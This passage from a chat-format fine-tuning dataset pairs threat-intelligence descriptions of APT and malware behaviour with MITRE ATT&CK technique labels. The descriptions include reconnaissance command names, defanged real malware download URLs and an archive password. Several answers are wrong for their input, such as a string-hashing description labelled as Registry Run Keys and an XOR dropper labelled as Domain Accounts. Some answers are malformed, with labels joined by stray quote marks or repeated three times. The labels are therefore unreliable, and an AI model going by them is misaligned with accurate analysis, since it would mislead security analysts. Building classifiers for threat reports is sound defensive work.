format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used \"cmd.exe net user /domain\" to enumerate domain users." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used WMI event subscriptions for persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used repeated MFA requests to gain access to victim accounts." }, { "role": "assistant", "content": "T1621 - Multi-Factor Authentication Request Generation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet sends compromised victim information via HTTP." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUGARDUMP using SMTP for C2 communication – dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp://128.199.6[.]246/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. " }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has obtained valid accounts to gain initial access." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can find and collect data from removable media devices." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Also, on some infected computers we found a tool called the Winexesvc tool. The main difference is that the Winexesvc tool enables the execution of remote commands from Linux-based operating system. When the Linux binary “winexe” is run against a Windows server, the winexesvc.exe executable is created and installed as a service" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If there are keys for the string encryption with the XOR algorithm, the configuration data will be also encrypted with the XOR algorithm" }, { "role": "assistant", "content": "T1573 - Encrypted Channel', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seasalt creates a Registry entry to ensure infection after reboot under \"HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has downloaded second stage malware from compromised websites." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can determine the IP and physical location of the compromised host via IPinfo." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This file issued a GET request to download a malicious file from: hxxp://94.23.172.164/dupdatechecker.doc" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rover automatically searches for files on local drives based on a predefined list of file extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SynAck can manipulate Registry keys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel malware can obtain system time from a compromised host." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can execute PE files in the address space of the specified process." }, { "role": "assistant", "content": "T1055.002 - Process Injection: Portable Executable Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LOWBALL abuses the Dropbox cloud storage service for command and control (CnC)" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST delivered different payloads, including TEARDROP in at least one instance." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has used Windows services as a way to execute its malicious payload." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has used svchost.exe to execute a malicious DLL ." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBferry can detect the victim's file or folder list." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can retrieve network information from a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk is designed to run with high privileges, this time it registers itself as a service under Plug-And-Play Support name" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil has been executed via malicious MS Word e-mail attachments." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The key descriptor’s string contains Bayren_Munchen which seems likely to refer to the German soccer team FC Bayern Munich. Regardless, it is not the content of the key descriptor – but its length – that matters, with that length used to retrieve the XOR key used to encrypt the payload" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire includes various modules to attempt to bypass UAC for escalation of privileges." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 uses HTTPS to conceal C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Forfiles can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before)." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition, although the 2017 campaign has been documented, during our research regarding MirageFox, we found a recently uploaded binary (6/8/2018) from the 2017 campaign, pretty much identical to a RAT mentioned in their RoyalAPT report, barely detected with only 7/66 detections on VirusTotal.  APT15 Code Reuse We found the new version of the RAT on VirusTotal hunting, by a YARA signature we created based off code only found in Mirage and Reaver, both attributed to Chinese government affiliated groups" }, { "role": "assistant", "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Those payloads consist of a legitimate and signed Microsoft executable used as a DLL search-order hijacking host and a malicious DLL loaded by that executable. The malicious DLL is a ShadowPad loader" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can enumerate files on a target system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has enumerated processes by ID, name, or privileges." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has downloaded additional Lua scripts from the C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions." }, { "role": "assistant", "content": "T1565.001 - Stored Data Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can check for the Telegram installation directory by enumerating the files on disk." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can take JPEG screenshots of an infected system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee has named component DLLs \"RapportGP.dll\" to match those used by the security company Trusteer." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can monitor processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto uses the \"zip -r\" command to compress the data collected on the local system." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments" }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff MD5 1ff40e79d673461cd33bd8b68f8bb5b8 Compiled 2017.08.06 11:32:36 (GMT), 2.22 Type I386 Windows Console EXE Size 101 888 Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters: Parameter Description -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla used \"net use\" commands to connect to lateral systems within a network." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon has been seen overwriting features of disk structure such as the MBR." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor can upload data and files from a victim's machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can use RunDLL32 for execution." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has used the Exchange Power Shell module \"Set-OabVirtualDirectoryPowerShell\" to export mailbox data." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection" }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel uses RC4 for encrypting the configuration." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One legitimate executable, sometimes signed, and vulnerable to dynamic-link library (DLL) sideloading - One malicious DLL loaded by the legitimate file - One binary file usually containing obfuscated code, unpacked in memory by the malicious DLL" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK is capable of performing remote file transmission." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values. InvisiMole also has a built-in command to modify file times." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo can enumerate all windows on the victim’s machine." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has used FTP for C2 connections." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine. The stager will be described in more detail in the next section" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used \"net user /domain\" to enumerate domain accounts." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "was distributed through a compromised update to a Tor client with a coin miner payload." }, { "role": "assistant", "content": "T1195 - Supply Chain Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gets an output of running processes using the tasklist command." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindTail can invoke Apple APIs \"contentsOfDirectoryAtPath\", \"pathExtension\", and (string) \"compare\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As part of our investigation, we monitored exactly what the cybercriminals did on an infected PC. In particular, they they downloaded an auxiliary program ff._exe to the Config.Msi folder on the infected machine" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST request" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module" }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer uses custom encryption for C2 that uses 3DES." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": 